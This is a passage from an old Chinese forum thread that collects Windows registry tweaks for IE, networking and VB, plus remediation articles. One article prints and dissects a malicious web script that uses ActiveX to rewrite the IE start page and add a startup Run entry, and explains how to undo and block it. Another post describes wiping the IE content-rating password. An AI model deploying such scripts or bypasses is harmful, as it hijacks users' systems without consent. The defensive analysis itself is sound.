"NoBrowserOptions"=dword:00000001(禁用"工具"菜单的"Internet选项"菜单项)
"NoViewSource"=dword:00000001(禁用"查看"菜单的"源文件"菜单项)
"NoTheaterMode"=dword:00000001(禁用"查看"菜单的"全屏显示"菜单项)
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions]
"NoBrowserSaveWebComplete"=dword:00000001(禁用"文件"菜单的另存为"网页,全部"格式)
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer]
"DisableImportExportFavorites"=dword:00000001(禁止导入和导出收藏夹)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoToolbarCustomize"=dword:00000001(禁用自定义IE工具栏按钮)
"NoBandCustomize"=dword:00000001(禁用自定义IE工具栏)

《管理员认可的控件》
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\AllowedControls]
"{22D6F312-B0F6-11D0-94AB-0080C74C7E95}"=dword:00000000(Windows Media Player)
"{05589FA1-C356-11CE-BF01-00AA0055595A}"=dword:00000000(ActiveMovie控件)
"{D27CDB6E-AE6D-11cf-96B8-444553540000}"=dword:00000000(Shockwave Flash)
"{275E2FE0-7486-11D0-89D6-00A0C90C9B67}"=dword:00000000(MCSiMenu)
"{7823A620-9DD9-11CF-A662-00AA00C066D2}"=dword:00000000(弹出式菜单对象)
"{F5131C24-E56D-11CF-B78A-444553540000}"=dword:00000000(Ikonic菜单控件)
"{2D360201-FFF5-11D1-8D03-00A0C959BC0A}"=dword:00000000(DHTML编辑控件)
"{DED22F57-FEE2-11D0-953B-00C04FD9152D}"=dword:00000000(CarPoint自动报价器控件)
"{D45FD31B-5C6E-11D1-9EC1-00C04FD7081F}"=dword:00000000(Microsoft Agent控件)
"{D6526FE0-E651-11CF-99CB-00C04FD64497}"=dword:00000000(MSChat控件)
"{AE24FDAE-03C6-11D1-8B76-0080C744F389}"=dword:00000000(Microsoft Scriptlet组件)
"{BD1F006E-174F-11D2-95C0-00C04F9A8CFA}"=dword:00000000(Microsoft Survey控件)
"{2FF18E10-DE11-11D1-8161-00A0C90DD90C}"=dword:00000000(MSNBC News Control)
"{26F24A93-1DA2-11D0-A334-00AA004A5FC5}"=dword:00000000(NetShow文件传输控件)
"{9276B91A-E780-11d2-8A8D-00C04FA31D93}"=dword:00000000(MSN Investor Chart控件)
"{52ADE293-85E8-11D2-BB22-00104B0EA281}"=dword:00000000(MS Investor Ticker)

《"安全区域"策略》
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"Security_HKLM_only"=dword:00000001(所有用户使用同一安全区域信息)
"Security_options_edit"=dword:00000001(禁止所有用户更改安全区域设置)
"Security_zones_map_edit"=dword:00000001(禁止所有用户添加或删除安全区域中的站点)

《代理服务器设置应用于所有用户》
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]

  • 2005-8-27 10:49
  • 回复
  • srxljl
  • 9位粉丝

10楼

"ProxySettingsPerUser"=dword:00000000

《禁止IE自动安装组件》
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions]
"NoJITSetup"=dword:00000001

《禁止定期检查IE软件更新》
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions]
"NoUpdateCheck"=dword:00000001
[注]默认情况下,IE每隔30天检查一次是否有新版本,如果有,则向用户发出通知。

《禁止默认共享》(WINNT/2000/XP)
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"AutoShareServer"=dword:00000000(Server)
"AutoShareWks"=dword:00000000(Professional)

《一个网卡多个IP》
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans\0000(0001...)](WIN9X)
[操作]找到一个包含真实IP的子键,修改字符串值"IPAddress"、"IPMask",每个IP地址之间加","号,如:
"IPAddress"="192.168.1.6,192.168.1.8"
"IPMask"="255.255.255.0,255.255.255.0"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces](WIN2000/XP)
[操作]找到一个包含真实IP的子键,修改多字符串值"IPAddress"、"SubnetMask",添加IP及对应的子网掩码。

《修改网卡MAC地址》
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Net\0000(/0001/0002...)](WIN9X)
"NetworkAddress"="xxxxxxxxxxxx"
[HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318} \0000(/0001/0002...)](WIN2000/XP)
"NetworkAddress"="xxxxxxxxxxxx"

《定制IE标题》
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="ab"

《显示"频道栏"》
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Show_ChannelBand"="yes"

《设置IE背景位图》
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar]
"BackBitmap"/"BackBitmapIE5"="ab"

《清理IE右键菜单》
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt]
[操作]删除相关主键。

《清理IE地址栏历史记录》
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedUrls]
[注]如只清理单个条目,则必须重新从1开始不间断排序,否则间断以后的部分将不能在地址栏显示。

《清理IE工具栏》
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar]
[操作]删除相关键值。

《清理IE工具栏按钮》
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions]
[操作]删除相关主键。

《IE自动搜索字符串》
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\UrlTemplate]

《定制IE地址简写名称》
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLS]
[操作]新建字符串值,名称为网址简写名称,数据为要转到的网址。以后在IE地址栏输入:about:<简称>,就可以直接到达该网址。
[注]IE的空白网页,取消浏览的网页,出错网页等都在这里定义。

《重新安装IE》
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer]
[操作]把字符串"Version"的数据值改成比要安装的版本小。

《重新安装IE(适用于同一版本)》
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
"IsInstalled"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]

  • 2005-8-27 10:49
  • 回复
  • srxljl
  • 9位粉丝

11楼

"IsInstalled"=dword:00000000

《清除IE分级审查密码》
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Ratings]
[操作]WIN9X:删除键值"Key",再删除%WINDIR%\SYSTEM目录里的RATINGS.POL文件。
WIN2000/XP:删除此主键下所有键值及子键即可。

《让IE同时下载多个文件》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer"=dword:0000000a(IE能同时下载10个文件)
"MaxConnectionsPer1_0Server"=dword:0000000a(对于HTTP 1.0服务器)
[注]默认情况下,IE只能在同一网站同时下载两个文件,不同网站不受限制。

《禁止/允许IE下载》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1803"=dword:00000003(禁止)/00000000(允许)
[注]在Internet选项的安全栏里也可以设置。

《禁止/允许显示flash动画》
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
"Compatibility Flags"=dword:00000400(禁止)/00000000(允许)

《IE打开网页时的默认前缀》
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes]
"www"="http://"(以www开头的网址)
"ftp"="ftp://"(以ftp开头的网址)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix]
@="http://"(以其它字符开头的网址)

《Outlook Express》
[HKEY_CURRENT_USER\Identities\\Software\Microsoft\Outlook Express\5.0]
"WindowTitle"="ab"(更改Outlook Express标题)
"NoSplash"=dword:00000001(不显示启动画面)
[注]代表用户ID,格式为{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}。
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Outlook Express]
"No Modify Accts"=dword:00000001(禁止创建及修改帐户)
"HTTP Mail Enabled"=dword:00000000(禁止使用HTTP邮件功能)

《加快网上邻居的访问速度》(WIN2000/XP)
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace]
[操作]删除{2227A280-3AEA-1069-A2DE-08002B30309D}(打印机)和{D6277990-4C6A-11CF-8D87-00AA0060F5BF}(计划任务)。

《清理网上邻居历史记录》(WIN9X)
[HKEY_CURRENT_USER\Network\Recent]

- 作者: xone 2005年04月16日, 星期六 04:58  回复(0) |  引用(0) 加入博采 
 注册表应用精华(一) 
想在网上找找隐藏桌面图标的方法,结果搜到这个......

windows 9X和其它所有版本注册表设置





《开始菜单及相关设置》
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRecentDocsMenu"=dword:00000001(隐藏开始->文档菜单)
"NoRecentDocsHistory"=dword:00000001(禁止将打开的文档存入历史记录)
"ClearRecentDocsOnExit"=dword:00000001(退出系统自动清除历史记录

  • 2005-8-27 10:49
  • 回复
  • srxljl
  • 9位粉丝

12楼

注册表的IE设置项: 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings] 
(1)"GlobalUserOffline"=dword:00000000 是否脱机方式 
(2)"User Agent"="Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" 设置代理程序 
(3)"IE4_UA_Backup_Flag"="4.0" IE4.0 的User Agent程序的备份标志 
(4)"EmailName"="IE40user@" 电子邮件名称 
(5)"AutoConfigProxy"="wininet.dll" 使用 wininet.dll 自动配置代理服务器 
(6)"MimeExclusionListForCache"="multipart/mixed multipart/x-mixed-replace multipart/x-byteranges " 
指定不放在缓存中的文件格式 
(7)"Trust Warning Level"="High" 设置病毒检查级别 
(8)"DisconnectIdleTime"=hex:14,00,00,00 设置自动断开连接前的空闲时间,分钟 
(9)"EnableAutodisconnect"=hex:01,00,00,00 是否允许自动断开连接 
(10)"EnableSecurityCheck"=hex:01,00,00,00 在拨号前是否允许进行安全检查 
(11)"FtpDefaultExpiryTimeSecs"=hex:80,51,01,00 FTP服务器响应的最大时间 
(12)"GopherDefaultExpiryTimeSecs"=hex:80,51,01,00 Gopher服务器响应的最大时间 
(13)"HttpDefaultExpiryTimeSecs"=hex:c0,a8,00,00 Http服务器响应的最大时间 
(14)"SyncMode"=hex:02,00,00,00 设置同步模式 
(15)"UseSchannelDirectly"=hex:01,00,00,00 是否使用频道目录 
(16)"EnableHttp1_1"=dword:00000001 是否允许使用HTTP 1.1版本 
(17)"ProxyEnable"=hex:01,00,00,00 是否使用代理服务器 
(18)"ProxyServer"="192.168.1.104:80" 代理服务器的IP地址及端口 
(19)"EnableAutodial"=hex:00,00,00,00 是否允许自动拨号 
(20)"AutoConnect"=hex:01,00,00,00 是否自动连接 

--------------------------------------------------------------- 

注册表的IE设置项: 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings] 
(1)"GlobalUserOffline"=dword:00000000 是否脱机方式 
(2)"User Agent"="Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" 设置代理程序 
(3)"IE4_UA_Backup_Flag"="4.0" IE4.0 的User Agent程序的备份标志 
(4)"EmailName"="IE40user@" 电子邮件名称 
(5)"AutoConfigProxy"="wininet.dll" 使用 wininet.dll 自动配置代理服务器 
(6)"MimeExclusionListForCache"="multipart/mixed multipart/x-mixed-replace multipart/x-byteranges " 
指定不放在缓存中的文件格式 
(7)"Trust Warning Level"="High" 设置病毒检查级别 
(8)"DisconnectIdleTime"=hex:14,00,00,00 设置自动断开连接前的空闲时间,分钟 
(9)"EnableAutodisconnect"=hex:01,00,00,00 是否允许自动断开连接 
(10)"EnableSecurityCheck"=hex:01,00,00,00 在拨号前是否允许进行安全检查 
(11)"FtpDefaultExpiryTimeSecs"=hex:80,51,01,00 FTP服务器响应的最大时间 
(12)"GopherDefaultExpiryTimeSecs"=hex:80,51,01,00 Gopher服务器响应的最大时间 
(13)"HttpDefaultExpiryTimeSecs"=hex:c0,a8,00,00 Http服务器响应的最大时间 
(14)"SyncMode"=hex:02,00,00,00 设置同步模式 
(15)"UseSchannelDirectly"=hex:01,00,00,00 是否使用频道目录 
(16)"EnableHttp1_1"=dword:00000001 是否允许使用HTTP 1.1版本 
(17)"ProxyEnable"=hex:01,00,00,00 是否使用代理服务器 
(18)"ProxyServer"="192.168.1.104:80" 代理服务器的IP地址及端口 
(19)"EnableAutodial"=hex:00,00,00,00 是否允许自动拨号 
(20)"AutoConnect"=hex:01,00,00,00 是否自动连接 

--------------------------------------------------------------- 

我有一个比较牛的思路: 
1.先把IE设置代理服务器的部分变灰,不让用户设置。 
2.设一个不存在代理的IP地址,用户自然上不了网,需要的时候,再把代理去掉。 
有一点需要注意的是,非IE内核的浏览器会失效,比如Opera。最好自己写个代理服务器,也不是太难。 
--------------------------------------------------------------- 

现在的网吧管理系统大部分不用修改注册表这种方式来实现的,因为很容易被人破解。我看过的几个系统是用代理DLL或者替换ws2_32.dll来实现。 
hook ws2_32.dll中的socket API可以实现,这个好象难一点,控制IE还可以写BHO插件进行控制 
---------------------------------------------------------------

  • 2005-8-27 10:50
  • 回复
  • srxljl
  • 9位粉丝

13楼

http://www.xingworld.net/reg/display.asp?id=8

(01) 解剖恶意网站代码:开机后弹出IE页面 
许多网友纷纷指出有的网站更是不择手段,当用户访问过它们的网页后,不仅IE默认首 
页被篡改了,而且每次开机后IE都会自动弹出访问该网站。 
  我们通过对下面这段JavaScript程序的解剖,希望读者能明白其究竟,并掌握修复 
的方法。网站应该用丰富精彩的栏目来吸引访问者,希望通过对用户注册表的恶意篡改 
来达到提高访问量的目的不仅会事得其反,更是一种不道德的行为。 
  本代码由子昂轩编辑制作,仅供学习研究之用。 
<!-- Begin set start page brought to u by JavaHouse.126.com--> 
<SCRIPT language=JavaScript> 
document.write(\"<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXCompon 
ent></APPLET>\"); 
function f(){ 
try 

//ActiveX初始化过程(为达到修改用户注册表所必须的准备程序) 
a1=document.applets[0]; 
a1.setCLSID(\"{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}\"); 
a1.createInstance(); 
Shl = a1.GetObject(); 
a1.setCLSID(\"{0D43FE01-F093-11CF-8940-00A0C9054228}\"); 
a1.createInstance(); 
FSO = a1.GetObject(); 
a1.setCLSID(\"{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}\"); 
a1.createInstance(); 
Net = a1.GetObject(); 
try 

if (documents .cookie.indexOf(\"Chg\") == -1) 
//以下是检测用户注册表并修改相应的键值 

Shl.RegWrite (\"HKCU\\\\Software\\\\Microsoft\\\\ 
  Internet Explorer\\\\Main\\\\Start Page\", \"http://JavaHouse.126.com/\
);//修改用户InternetExplorer浏览器的默认主页 
Shl.RegWrite (\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\ 
  CurrentVersion\\\\Run\\\\\", \"http://JavaHouse.126.com/\");//建立默认启 
动页面程序,保证用户每次启动计算机首先打开该页面 
var expdate = new Date((new Date()).getTime() + (1)); 
documents .cookie=\"Chg=general; expires=\" + expdate.toGMTString() + \"; path 
=/;\" 


catch(e) 
{} 

catch(e) 
{} 

function init() 

setTimeout(\"f()\", 1000);//实现打开页面后1秒钟内执行测试修改注册表的工作 

init();</SCRIPT> 
<!--End set start page --> 
  首先,我们来分析一下这句代码,程序中使用: 
Shl.RegWrite (\"HKCU\\\\Software\\\\ 
  Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page\", 
  \"http://JavaHouse.126.com/\");//修改用户InternetExplorer浏览器的默认主页 

  其实就是修改用户注册表中 
HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\main\\文件夹下Sta 
rt Page的键值, 
这里面的值就是存放的IE浏览器的默认主页,如果你想改回来,把上面的相应代码改为 
: 
Shl.RegWrite (\"HKCU\\\\Software\\\\Microsoft\\\\ 
  Internet Explorer\\\\Main\\\\Start Page\", \"about:blank\"); 
  就可以实现打开IE是空白页了;当然你也不用动注册表,直接打开IE修改Internet 
选项中的主页更方便些。 
  再来看看上述程序最卑鄙的一句代码: 
  Shl.RegWrite (\"HKCU\\\\Software\\\\Microsoft\\\\ 
  Windows\\\\CurrentVersion\\\\Run\\\\\",\"http://JavaHouse.126.com/\");// 
建立默认启动页面程序,保证用户每次启动计算机首先打开该页面 
通过在注册表中 
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ 
  CurrentVersion\\Run\\ 
  文件夹下建立Windows默认启动程序,当Windows启动后,我们会发现这个网页会自 
动打开,但是在“开始”-“程序”-“启动”中却找不到,这是为什么呢?哦,原来 

  • 2005-8-27 10:51
  • 回复
  • srxljl
  • 9位粉丝

14楼

都放到Run这个文件夹下面了。怎么来修改呢?两种方法,一是查找源头,进入注册表, 
删除Run下面的相应项就可以了;二是在“开始”-“运行”处输入\"msconfig\",把启 
动下面相应的那个网站前面的\"√\"去掉,重新启动计算机就可以了。 
   
  避免此类恶意修改注册表的再次发生,你可以在IE的安全属性设置中禁掉ActiveX, 
当然在以后的网页浏览过程中可能会造成一些正常使用ActiveX的网站无法浏览。还有一 
种办法就是对于Windows98打开C:\\WINDOWS\\JAVA\\Packages\\CVLV1NBB.ZIP,把Acti 
veXComponent.class删掉;对于WindowsMe打开C:\\WINDOWS\\JAVA\\Packages\\5NZVFPF 
1.ZIP,把ActiveXComponent.class删掉。放心,删除这个组件不会影响你正常浏览网页 
的。 
  最后说说在首页使用这类代码的网站的目的,像在启动计算机直接打开网页的做法 
我认为主要是针对宽带和专线上网的用户,这样只要你不修改注册表禁掉它,你的IE主 
页每次进入系统都会自动被修改成那个网站;对于拨号上网的用户每次进入系统都开一 
个找不到的主页,也无所谓,至少你不改注册表,直接修改IE主页属性后可以避免被那 
种网站再次修改(前提是不再进那个网站),可是每次开机后都弹出个网页也真是让人 
讨厌。 
  以上代码适用于Windows9x/Me,InternetExplorer5.X浏览器,据说对IE6.0无效( 
因为它里面没有ActiveXComponent.class这个组件),但作者没有测试过。
 
 
 
(02) 免疫你的电脑(作者:j3j4.com 发表于:2002-03-24) 
相信每个上网者都有过被恶意代码修改过注册表的经历吧,恢复好了以后你会采取措施来保护你的注册表不再被修改呢

1.备份注册表文件
2.用软件免疫
3.禁用js

显然这些方法都不怎么理想,其实有一招简单的方法是可以永远免疫的,就是在注册表中删除恶意代码会用到的一个id就可以了,那就是F935DC22-1CF0-11D0-ADB9-00C04FD58A0B,只要把它删了,那你以后碰到恶意代码,就再也不用担心注册表会再被修改了,它在注册表里面的路径是HKEY_CLASSES_ROOT\CLSID\{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B},找到后把整个项删掉就可以了,这个项删掉不会对系统有任何影响,请放心删除.

这里再介绍几个对系统安全有隐患的ID
HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228},网页代码可以利用他在硬盘里面生成文件

HKEY_CLASSES_ROOT\CLSID\{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B},可以生成命令格式,比如格式化硬盘,执行任何程序.

HKEY_CLASSES_ROOT\CLSID\{B83FC273-3522-4CC6-92EC-75CC86678DA4},这个好像是3721中文网址的,我发现很多朋友都觉得3721很霸道,删了就不用管它了
 
 
 
(03) 如何控制 Windows98 的注册表检查器 
Scanreg,Scanregw.exe 是 Windows98 新增的注册表检查器。每次启动Windows98 时,会自动在C:\Windows\SysBackup子目录下备份一个备份文件(后缀为.CAB),该备份文件包括如下系统文件:System.ini, Win.ini, System.dat, User.dat 等。此 .CAB 文件大概占用 500KB 左右。您可以根据情况不加载注册表检查器,或者只备份注册表文件

1、不加载注册表检查器

我们可以不让注册表检查器在启动时检查和备份注册表,步骤:

(1) 启动注册表编辑器。

(2) 打开HKEY_LOCA_MACHINE\Software\Microsoft\Windows\CurrentVersion\Rum分支。

(3) 在该分支的右窗格内可以看到ScanRegistry键值名,它的键值为“C:\Windows\Scanregw.exe\autorun"。

(4) 选中此键值数据,然后按Del键将它删除。

(5) 重新启动Windows98。

2、只检查注册表文件

如果您只想检查注册表而不备份,可以执行下面的步骤:

(1) 使用记事本打开 C:\ Windows 目录下的 Scanreg.ini 文件

(2) 在此文件中查找 Backup=1 这一行,将此行修改为 Backup=0 后存盘即可。

  • 2005-8-27 10:51
  • 回复
  • srxljl
  • 9位粉丝

15楼

 
 
 
(04) 用 VB 函数访问注册表 
注册表在 Windows 9x 中的作用是不言而喻的,它除了保存操作系统自身的软件、硬件及环境信息外,一个重要的用途就是保存应用程序中允许用户定制修改的配置信息。 在Visual Basic应用程序中,有两种访问系统注册表的方法:一种是使用 VB 自带的注册表函数,另一种则是使用 Windows API 函数,这两种方法各有优缺点,前者功能简单但容易使用,后者则功能强大但使用相对复杂一些,本文给大家介绍用 VB 自带的函数访问系统注册表的方法。 

一、用 VB 函数访问注册表的方法

在 VB5.0 中自带的注册表函数(命令)共有4条,分别是SaveSetting、GetSetting、GetAllSettings和DeleteSetting,下面是四个函数的详细用法: 
(1)SaveSetting appname, section, key, setting appname 应用程序或工程的名称

section 注册表区域名称,在该区域保存注册表项设置

key 要修改的注册表项的名称

setting key的设置值

SaveSetting的功能是在注册表中指定应用程序的区域中为某注册表项赋值,如果指定的应用程序名、区域名或注册表项不存在,则先建立再赋值。可以利用这条命令建立某个注册表项或修改注册表项的值。 如命令SaveSetting 〃MyApp〃, 〃Option〃, 〃MyValue〃, 1的功能是将程序TestApp的Option区中MyValue表项的值赋为1,如果MyValue不存在则先建立该表项再赋值为1。 
(2) GetSetting(appname, section, key[, default]) appname 应用程序或工程的名称

section 区域名称

key 注册表项名称

default  key的缺省值,为可选参数

GetSetting的功能是从注册表中的应用程序指定区域中返回某注册表项的设置值,如果 GetSetting 的参数中的任何一项在注册表中都不存在,或key没有赋值(即=〃〃)时,则返回default指定的值。 如代码Value=GetSetting(〃MyApp〃, 〃Option〃, 〃MyValue〃)可以获取程序TestApp的Option区中MyValue表项的值。 
(3)GetAllSettings(appname, section) appname 应用程序或工程的名称

section 区域名称

GetAllSettings函数返回Variant型数据,其内容为字符串的二维数组,该二维数组包含指定区域中的所有注册表项设置及其对应值。如果指定的appname或section不存在,则返回未初始化的Variant。 如命令MySettings=GetAllSettings(〃MyApp〃, 〃Option〃)可获取Option下所有注册表项的名称和取值,并将结果保存在变体型数据MySettings中。 
(4)DeleteSetting appname[, section[, key] ] appname 应用程序或工程的名称

section 要删除注册表项设置的区域名称,为可选参数

key 要删除的注册表项,为可选参数

DeleteSetting命令在注册表中,删除应用程序信息、区域或注册表项。当只提供appname参数时,将删除appname指定的应用程序的所有信息,如果提供了appname和section参数,则删除section指定的区域,如果提供了所有参数,则删除指定的注册表项设置。 如果指定的应用程序、区域或注册表项不存在,DeleteSetting将不做任何事情。 如:DeleteSetting 〃MyApp〃将删除MyApp应用程序保存的全部信息。

二、程序实例

下面以一个简单的实例说明四个函数的使用。

新建工程,在Form1上放置两个标签,Caption属性分别为“姓名”和“公司”;两个文本框txtName和txtCompany,Text属性均设为空;三个命令按钮cmdSave、cmdFind和cmdDelete,Caption分别设为“保存”、“查看”和“删除”。 
给三个命令按钮添加如下代码:

Private Sub cmdSave_Click()

′将两个文本框中的内容分别赋给MyApp下User区中Name和Company 
SaveSetting 〃MyApp〃, 〃User〃, 〃Name〃, txtName 
SaveSetting 〃MyApp〃, 〃User〃, 〃Company〃, txtCompany 
MsgBox 〃您的信息已成功保存!〃

End Sub

Private Sub cmdFind_Click()

  • 2005-8-27 10:51
  • 回复
  • srxljl
  • 9位粉丝

16楼


′查找MyApp下User区中Name和Company的设置值并显示 
MsgBox 〃您的姓名是:〃 & GetSetting(〃MyApp〃, 〃User〃, 〃Name〃) & Chr(13) & Chr(10) & 〃您的公司是:〃 & GetSetting(〃MyApp〃, 〃User〃, 〃Company〃) 
End Sub

Private Sub cmdDelete_Click()

′删除MyApp下的User区域及其下的所有注册表项 
DeleteSetting 〃MyApp〃, 〃User〃 
End Sub

运行程序,在窗口中输入姓名和公司名称,之后按“保存”按钮,然后再按“查找”,可以看到显示出了正确的结果,说明保存和查找操作都已正常进行。如果在保存之前或删除之后按“查找”按钮,则出现一个对话框,说明要找的注册表项不存在。

使用上面介绍的四个函数(命令),我们可以非常容易地在 VB 代码中访问系统注册表。但有一点比较遗憾,VB 的这几个函数只能在系统注册表的固定位置进行工作,即只能在\KEY_CURRENT_USER\Software\VB and VBA Program Settings下完成建立、修改和删除操作,当然这个限制对于一般的应用程序无关大局,但对较大的应用程序就会造成一些不便,这时我们就需要借助于 WindowsAPI 函数。 
 
 
(05) 备份注册表一法 
  不少安装程序(或你自己直接处理)都可能搞乱你系统的注册表,从而引发不测,所以我们应该定期地备份 user. dat 和 system.dat 文件。但目前的资源管理器(或者是DOS来)都不能直接复制这两个文件,我们最好利用专门工具:

  在Windows 95 CD-ROM安装盘中有一个可对注册表制作9个备份的程序:Cfgback.exe。 使用时,需要先把Cfgback.exe文件从CD-ROM的\Other\Msic\Cfgback文件夹复制到c:\Windows,然后把Cfgb ack.hlp文件复制到c:\Windows\help。想制作备份时,只要双击Cfgbck.exe并遵循其提出的详细指导就行。
 
 
 
(06) 间接修改注册表的简易方法 
  如果您对注册表不是很了解,就不要贸然使用注册表编辑器直接编辑注册表。可以使用一种“温和”的方法——间接修改注册表,即向注册表中添加表项,可用注册表文本文件(.reg)来完成。

  在注册表文本文件的首行必须用命令字符串 “REGEDIT4”或“Windows Registry Editor Version 5.00”,其作用是通知系统调用 regedit 来完成注册信息的合并工作。 接下来的每一行或代表一个键值的声明或者为注释性的说明信息。

  主键及其默认键值的声明格式为:

  根键\一级主键\二级主键\......=默认键值

  例如,欲在根键 HKEY_CLASSES_ROOT的“*”主键下添加一个“压缩”主键,以便通过上下文菜单直接压缩选定的文件,其主键的声明如下:

  HKEY_CLASSES_ROOT\*\shell\压缩 (&U)\command = C:\dos\arj.exe a Temp$%1 其中,“shell”和“command”都是固定的,不能更改和替换,“shell”指明将要为上下文菜单中添加命令, “command”指明具体的命令行信息。另外还要注意,在等号右边的键值字符串中, 如果要指明文件的路径,其中的“\”字符要使用“\\"代替,等号的前后还要添加一个起分隔作用的空格。

  凡是用分号开头的行,均为说明信息行,用户可以利用说明行给文件中的命令给予必要的注解,使命令便于理解。

  使用任何一个编辑器,编辑生成一个包含一系列主键声明行、说明行的列表,并将文件保存为以“.reg”为扩展名的文本文件,即创建了一个注册表文本文件。

  例如,将下面的文字保存为 *.reg 文件,运行后就能使得桌面上的图表全部消失:
------------------------------------------------------------------------------------------------
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer ]
"nodesktop"=dword:00000001

  大家看到了,第三行中的 dword 表示键值 "nodesktop" 为 dword 值,那么下面就以新建一个键值为 new 的键为例,列表如下:

  • 2005-8-27 10:51
  • 回复
  • srxljl
  • 9位粉丝

17楼


  字符串 --> "new"="XingWorld.org is great"
  二进制 --> "new"=hex:00,00,00,00
多字符串值 --> "new"=hex(7):00,00,00,00
可扩充字符串 --> "new"=hex(2):00,00

  还有一点要补充,就是有时你还会遇到这样的语句:@="XingWorld.org is great",在这里 "@" 是表示默认键值的意思!
 
 
 
(07) 直接修改注册表的基本方法 
  Windows 95 利用注册表来管理所有的硬件和软件设置。注册表(Registry)提供了一个统一的数据库,并以分层的形式存储系统和应用程序配置数据。每次启动计算机时都会形成注册表,它的内容是由即插即用事件、机器的设置文件(System.dat)和用户信息(User.dat)以及在某种情况下由网络文件服务器施加的系统策略所组成,是一个存储着计算机配置信息的数据库文件, 它取代了原系统所有组件和应用程序之INI文件的使用,实为Windows 95系统的一个管理信息数据库,目前Windows 95所有的系统管理归根结底都是通过注册表项的设置来实现的。因为注册表项繁多且信息可读性差,一旦修改错误,就可能导致系统不能启动,所以一般不主张让用户直接修改注册表。

  但对于熟悉注册表项设置的高级用户,如果使用控制面板和策略文件不能达到目的,也就只能采用这种最直接、最全面的处理方法。具体使用方法是把Windows 95安装光盘中\Admin目录下的Regedit. exe(注册表编辑器)文件拷贝到本地硬盘上运行,去掉注册表只读方式,对系统注册表项进行修改,完成后应存盘退出。下次系统启动时,新设置就会生效。
 
 
 
(08) 关联自己的程序(作者:伟博软件*vbersoft.com 发表于:2002-02-02) 
Windows中的记事本功能太少,Word和WPS吧有时又觉得有点杀鸡用牛刀的感觉,于是有很多程序员自己为自己编写了一个功能强大的编辑器而且还定制了自己的文件格式,但是却不知当双击用自己的编辑器保存的文件时为何不能打开自己的编辑器,其实,要实现这个效果,只要修改一下注册表就可以办到啦。 
